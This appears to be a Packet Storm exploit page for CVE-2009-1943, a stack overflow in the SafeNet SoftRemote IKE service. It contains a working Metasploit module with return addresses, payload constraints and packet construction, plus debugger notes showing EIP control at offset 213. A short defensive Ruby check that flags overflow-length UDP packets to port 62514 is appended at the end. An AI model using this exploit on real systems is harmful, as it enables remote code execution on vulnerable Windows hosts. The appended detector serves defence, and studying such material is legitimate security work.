SafeNet SoftRemote IKE Service Buffer Overflow

26 Nov 2009 00:00:00 | Reported by MC | Type: packetstorm | Source: packetstormsecurity.com

Buffer Overflow in SafeNet SoftRemote IKE Service allows code execution via specially crafted UDP packe

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| Circl | CVE-2009-1943 | 22 Jun 2010 00:00 | circl |
| CVE | CVE-2009-1943 | 5 Jun 2009 21:00 | cve |
| Cvelist | CVE-2009-1943 | 5 Jun 2009 21:00 | cvelist |
| d2 | DSquare Exploit Pack: D2SEC_VPNJUN | 5 Jun 2009 21:30 | d2 |
| Exploit DB | SafeNet SoftRemote - IKE Service Buffer Overflow (Metasploit) | 22 Jun 2010 00:00 | exploitdb |
| Tenable Nessus | Juniper NetScreen VPN Client Multiple Buffer Overflow Vulnerabilities | 25 Sep 2013 00:00 | nessus |
| Kaspersky | KLA10317 ACE vulnerability in SafeNet SoftRemote | 5 Jun 2009 00:00 | kaspersky |
| Metasploit | SafeNet SoftRemote IKE Service Buffer Overflow | 2 Sep 2009 22:04 | metasploit |
| NVD | CVE-2009-1943 | 5 Jun 2009 21:30 | nvd |
| Prion | Stack overflow | 5 Jun 2009 21:30 | prion |

Code
```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  include Msf::Exploit::Remote::Udp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'SafeNet SoftRemote IKE Service Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack overflow in Safenet SoftRemote IKE IreIKE.exe
        service. When sending a specially crafted udp packet to port 62514 an
        attacker may be able to execute arbitrary code. This module has
        been tested with Juniper NetScreen-Remote 10.8.0 (Build 20) using
        windows/meterpreter/reverse_ord_tcp payloads.
      },
      'Author'         => [ 'MC' ],
      'Version'        => '$Revision$',
      'References'     =>
        [
          [ 'CVE', '2009-1943' ],
          [ 'OSVDB', '54831' ],
          [ 'BID', '35154' ],
          [ 'URL', 'http://reversemode.com/index.php?option=com_content&task=view&id=63&Itemid=1' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'           => 213,
          'BadChars'        => "\x00\x0a\x20\x0d",
          'StackAdjustment' => -3500,
          'PrependEncoder'  => "\x81\xc4\x54\xf2\xff\xff",
        },
      'Privileged'     => true,
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'SafeNet Irelke 10.8.0.20', { 'Ret' => 0x004514a9 } ],
          [ 'SafeNet Irelke 10.8.0.10', { 'Ret' => 0x00451889 } ],
          [ 'SafeNet Irelke 10.8.3.6', { 'Ret' => 0x00451929 } ],
        ],
      'DisclosureDate' => 'Jun 1 2009',
      'DefaultTarget'  => 0))

    register_options([Opt::RPORT(62514)], self)

  end

  def exploit

    connect_udp

    sploit = [0x01000000].pack('V') # IPC packet
    sploit << [0x00000033].pack('V') # Exploit this thing using command 0x11 (0x33 - 0x28).
    sploit << payload.encoded
    sploit << [target.ret].pack('V')
    sploit << rand_text_alpha_upper(150)

    print_status("Trying target #{target.name}...")
    udp_sock.put(sploit)

    sleep(5)
    handler
    disconnect_udp

  end

end
=begin
0:013> g
(f7c.fe0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=68413268 ebx=00dcfde8 ecx=00000000 edx=014af53c esi=00dcfdf1 edi=00000000
eip=41316841 esp=014af64c ebp=00000001 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
41316841 ?? ???
0:008> !pattern_offset 300
[Byakugan] Control of eax at offset 217.
[Byakugan] Control of eip at offset 213.
0:008> d esp
014af64c 68 32 41 68 33 41 68 34-41 68 35 41 68 36 41 68 h2Ah3Ah4Ah5Ah6Ah
014af65c 37 41 68 38 41 68 39 41-69 30 41 69 31 41 69 32 7Ah8Ah9Ai0Ai1Ai2
014af66c 41 69 33 41 69 34 41 69-35 41 69 36 41 69 37 41 Ai3Ai4Ai5Ai6Ai7A
014af67c 69 38 41 69 39 41 6a 30-41 6a 31 41 6a 32 41 6a i8Ai9Aj0Aj1Aj2Aj
014af68c 33 41 6a 34 41 6a 35 41-6a 36 41 6a 37 41 6a 38 3Aj4Aj5Aj6Aj7Aj8
014af69c 41 6a 39 41 6b 30 41 6b-31 41 6b 32 41 6b 33 41 Aj9Ak0Ak1Ak2Ak3A
014af6ac 6b 34 41 6b 35 41 6b 36-41 6b 37 41 6b 38 41 6b k4Ak5Ak6Ak7Ak8Ak
014af6bc 39 41 6c 30 41 6c 31 41-6c 32 41 6c 33 41 6c 34 9Al0Al1Al2Al3Al4
0:008> d esi
00dcfdf1 61 30 41 61 31 41 61 32-41 61 33 41 61 34 41 61 a0Aa1Aa2Aa3Aa4Aa
00dcfe01 35 41 61 36 41 61 37 41-61 38 41 61 39 41 62 30 5Aa6Aa7Aa8Aa9Ab0
00dcfe11 41 62 31 41 62 32 41 62-33 41 62 34 41 62 35 41 Ab1Ab2Ab3Ab4Ab5A
00dcfe21 62 36 41 62 37 41 62 38-41 62 39 41 63 30 41 63 b6Ab7Ab8Ab9Ac0Ac
00dcfe31 31 41 63 32 41 63 33 41-63 34 41 63 35 41 63 36 1Ac2Ac3Ac4Ac5Ac6
00dcfe41 41 63 37 41 63 38 41 63-39 41 64 30 41 64 31 41 Ac7Ac8Ac9Ad0Ad1A
00dcfe51 64 32 41 64 33 41 64 34-41 64 35 41 64 36 41 64 d2Ad3Ad4Ad5Ad6Ad
00dcfe61 37 41 64 38 41 64 39 41-65 30 41 65 31 41 65 32 7Ad8Ad9Ae0Ae1Ae2
0:008> s -b 0x00400000 0x0047c000 ff d6
.
.
004514a9 ff d6 8b e8 8d 44 24 10-c7 44 24 10 00 00 00 00 .....D$..D$.....
0:008> u 0x004514a9 L1
IreIKE+0x514a9:
004514a9 ffd6 call esi
=end
```
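
A defender-side check built from the packet layout in the module above, as an added example that is not part of the original module or page: it classifies UDP datagrams sent to port 62514 by their two header dwords and by whether the body is long enough to reach the return-address offset (213) shown in the debugger notes. The `Datagram` struct, the sample traffic and the treatment of non-loopback sources as an extra signal are assumptions made for illustration.

```ruby
# Added example, not part of the Metasploit module. Field values come from the
# module above; the Datagram struct and the sample traffic are constructed.
require 'ipaddr'

IKE_IPC_PORT  = 62514       # RPORT registered by the module
IPC_MARKER    = 0x01000000  # first little-endian dword ("IPC packet")
COMMAND_DWORD = 0x00000033  # second dword sent by the module
RET_OFFSET    = 213         # body offset of the saved return address (debugger notes)

Datagram = Struct.new(:src, :dst_port, :payload)

# Classify one datagram by its header and by how far its body reaches.
def classify(dgram)
  return :ignored unless dgram.dst_port == IKE_IPC_PORT
  data = dgram.payload.b
  return :malformed if data.bytesize < 8
  marker, command = data.unpack('VV')
  return :other_ipc unless marker == IPC_MARKER && command == COMMAND_DWORD
  (data.bytesize - 8) >= RET_OFFSET + 4 ? :overflow_length : :short_body
end

# Assumption: the port carries local IPC only, so a non-loopback source is
# reported as an extra signal next to the length check.
def alerts(datagrams)
  datagrams.filter_map do |d|
    verdict = classify(d)
    remote = !IPAddr.new(d.src).loopback?
    next unless verdict == :overflow_length || (remote && verdict != :ignored)
    { src: d.src, verdict: verdict, remote: remote, bytes: d.payload.bytesize }
  end
end

HEADER = [IPC_MARKER, COMMAND_DWORD].pack('VV')
SAMPLE = [
  Datagram.new('127.0.0.1', IKE_IPC_PORT, HEADER + ("\x00" * 16)),   # short local request
  Datagram.new('192.0.2.10', IKE_IPC_PORT, HEADER + ("\x00" * 367)), # body spans offset 213
  Datagram.new('192.0.2.10', 500, HEADER + ("\x00" * 367)),          # different port
  Datagram.new('192.0.2.11', IKE_IPC_PORT, "\x01\x00")               # truncated header
]

alerts(SAMPLE).each { |a| puts a.inspect } if __FILE__ == $PROGRAM_NAME
```

The 217-byte body threshold is the 213-byte offset plus the 4-byte return address; a lower threshold trades more noise for earlier warning on oversized requests.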
